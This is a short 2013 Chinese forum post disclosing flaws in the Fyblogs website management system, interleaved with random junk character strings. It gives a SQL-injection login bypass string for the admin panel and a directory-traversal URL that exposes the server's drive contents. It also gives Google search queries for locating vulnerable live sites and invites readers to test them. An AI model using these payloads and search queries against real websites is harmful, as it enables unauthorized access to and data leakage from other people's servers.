漏洞类型: 未授权访问/权限绕过0 z; r3 L$ I7 ^
) |: Y8 P$ }: G. H6 i, b简要描述:. D. X" K# P% n
- \/ z" P) ^6 s2 Q0 ^
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
' @$ S% ~, B6 W/ K0 m! _, a/ o8 l5 y- _
详细说明:$ R$ D. k4 R4 H% ^" r
' J5 C5 y# K/ e5 G后台万能密码 'or'='or'* K1 A/ B' L4 i2 n- |, T" K, c
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 f$ i- t1 ]/ g4 ~" m6 s aadmin/uploadfile.asp?currentFolder=/upfiles/../$ C" r2 \( L# O% c e) U1 u
5 y) Z" d9 d+ c. u+ l* [) K
漏洞证明:1 y. v ~! p" A4 Y8 ~, l
, d4 b' P# ^4 {+ x+ D
谷歌:inurl:type.asp?id=1 新闻中心/ _: z( n4 ?4 G! U( o
或者 :inurl:download_ok.asp?0 ^3 F0 A0 M+ N& j. d& O, G
; a5 O9 R) q" q3 @9 q4 R& g: J: ]
可以测试. w) ]2 z' L' O* s0 J4 R2 z
/ [6 q5 d3 d$ o
# J# o6 }' A" Z" ]) ]
|
发表于 2013-3-7 13:07:46
收藏
支持
反对